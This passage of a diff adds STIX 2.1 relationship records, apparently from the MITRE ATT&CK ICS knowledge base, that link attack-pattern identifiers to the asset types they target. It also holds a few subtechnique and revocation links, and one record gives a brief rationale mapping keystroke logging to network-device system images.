"relationship_type": "targets", + "source_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--305bb7a8-b5e3-406a-8f2b-d3bdccda2005", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3076c6d3-ec53-40c8-9ffb-dd7a174e24c2", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3096b8dd-ea2c-44eb-ac4d-391a6aed980d", + "created": "2024-07-02T13:55:55.770Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.770Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a3e1e6c5-9c74-4fc0-a16c-a9d228c17829", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--30971e7b-0a98-447f-91ac-51d5156efd46", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--5e4a2073-9643-44cb-a0b5-e7f4048446c7", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--30997fe7-1f92-404d-a710-5c0d4cabb856", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--03259939-0b57-482f-8eb5-87c0e0d54334", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--30a293a6-f27e-4052-8c8f-96da5e37c38d", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--30a29f1a-41ec-4cf2-8d47-07c03c2d96e0", + "created": "2023-08-24T17:23:37.162Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-08-24T17:23:37.162Z", + "description": "", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--4a2975db-414e-4c0c-bd92-775987514b4b", + "target_ref": "attack-pattern--22905430-4901-4c2a-84f6-98243cb173f8", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--30b844c9-0fdd-4a78-b164-b4140fd11bfa", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--232a7e42-cd6e-4902-8fe9-2960f529dd4d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--30cc6122-1e09-4c0c-8452-d7fd7bb5405a", + "created": "2024-05-22T17:23:10.715Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-28T01:07:27.015Z", + "description": "Asset Mapping Rationale: Adversaries may log user keystrokes to intercept credentials as the user types them. Modify System Image may provide adversaries with hooks into the operating system of network devices to read raw keystrokes for login sessions", + "relationship_type": "targets", + "source_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--30cf2430-0c57-451a-946c-b5b23b7d08cc", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0df05477-c572-4ed6-88a9-47c581f548f7", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--30d2d119-4a2d-470a-a3a8-ebf7063975a7", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--561ae9aa-c28a-4144-9eec-e7027a14c8c3", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--30f137c9-9be4-4e22-8dc3-8b42bc45b7e4", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--30f36dc4-ce12-4ccc-97bc-b70c0a045b58", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--67720091-eee3-4d2d-ae16-8264567f6f5b", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--31037f25-707f-44e5-a7f4-26e013d371c6", + "created": "2024-06-26T11:53:34.217Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T11:53:34.217Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b4409cd8-0da9-46e1-a401-a241afd4d1cc", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--31093b34-7239-4447-8b28-25e59641038c", + "created": "2024-07-02T13:55:55.757Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.757Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--311f79a8-363c-46a1-8aac-9e7f9a581877", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09b008a9-b4eb-462a-a751-a0eb58050cd9", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--312cffa6-cdda-48cd-a003-dfd7183355c3", + "created": "2020-02-20T22:07:27.659Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--b82f7d37-b826-4ec9-9391-8e121c78aed7", + "target_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--313b9402-0ce2-4cd3-babe-47c84d498eb2", + "created": "2024-06-21T14:12:20.259Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.259Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--74d2a63f-3c7b-4852-92da-02d8fbab16da", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--315620e9-62a8-4085-a173-8b812636d58c", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d157f9d2-d09a-4efa-bb2a-64963f94e253", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--31617dd8-ef39-440d-b557-dd456341f1bd", + "created": "2024-07-02T13:55:55.772Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.772Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--da051493-ae9c-4b1b-9760-c009c46c9b56", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--316d6590-c406-4347-864f-c5950b4c32d8", + "created": "2024-07-02T13:55:55.766Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.766Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bb5a00de-e086-4859-a231-fa793f6797e2", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3176db59-219f-44c8-ac4e-28a1cfbd79a3", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--01a5a209-b94c-450b-b7f9-946497d91055", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3188fad7-c01b-4641-8576-c8cf28ea0acb", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3120b9fa-23b8-4500-ae73-09494f607b7d", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--319259d1-4bd1-4449-98eb-fc9cde2ea337", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7610cada-1499-41a4-b3dd-46467b68d177", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3195745e-f53d-47f8-b813-1f7c734f1caf", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--31967e75-711c-4368-a6ce-cb2a87dc94a6", + "created": "2024-07-02T13:55:55.768Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.768Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0d91b3c0-5e50-47c3-949a-2a796f04d144", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--31cab097-b593-4bac-b050-095e617fbe26", + "created": "2024-07-02T13:55:55.764Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.764Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--4eeaf8a9-c86b-4954-a663-9555fb406466", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--31caea45-42a8-4431-b225-372c0c32779d", + "created": "2024-07-02T13:55:55.763Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.763Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--31d7e048-92fc-4b63-b0d5-28b64b39797a", + "created": "2023-10-02T20:18:11.933Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-10-02T20:18:11.933Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "target_ref": "x-mitre-asset--2b676abd-8263-49ea-81a4-78a7e1f776fe", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--31d8b158-a90e-4913-9cb6-aff0c340b9c5", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6075259-dba3-44e9-87c7-e954f37ec0d5", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--31f31ef7-75f1-4677-b195-45aa80f1dcc7", + "created": "2024-06-21T14:12:20.264Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.264Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--31f3944a-e7fc-423e-ba21-41ecbd0c05d3", + "created": "2024-06-21T14:12:20.265Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.265Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1a80d097-54df-41d8-9d33-34e755ec5e72", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3203c261-aba1-482a-b021-f8c128f68a24", + "created": "2024-07-02T13:55:55.769Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.769Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--494ab9f0-36e0-4b06-b10d-57285b040a06", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3208c81f-832a-42ee-acf2-2744a2bba41f", + "created": "2024-07-02T13:55:55.758Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.758Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3212de2a-6635-4b95-aeb4-9c0744aed2ce", + "created": "2023-09-28T21:16:44.471Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T21:16:44.471Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "target_ref": "x-mitre-asset--ecb81a8b-022e-4529-a404-55cffca7d3a3", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--32394169-bc38-4681-970a-7f2a6be8cf6d", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d74c4a7e-ffbf-432f-9365-7ebf1f787cab", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--32438a90-406c-40f7-a5ac-a1ca92cd51d5", + "created": "2023-09-28T20:26:15.542Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:26:15.542Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9f947a1c-3860-48a8-8af0-a2dfa3efde03", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--3253f096-b7cc-4217-8b40-b9fd50488f43", + "created": "2024-07-02T13:55:55.754Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.754Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6add2ab5-2711-4e9d-87c8-7a0be8531530", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + 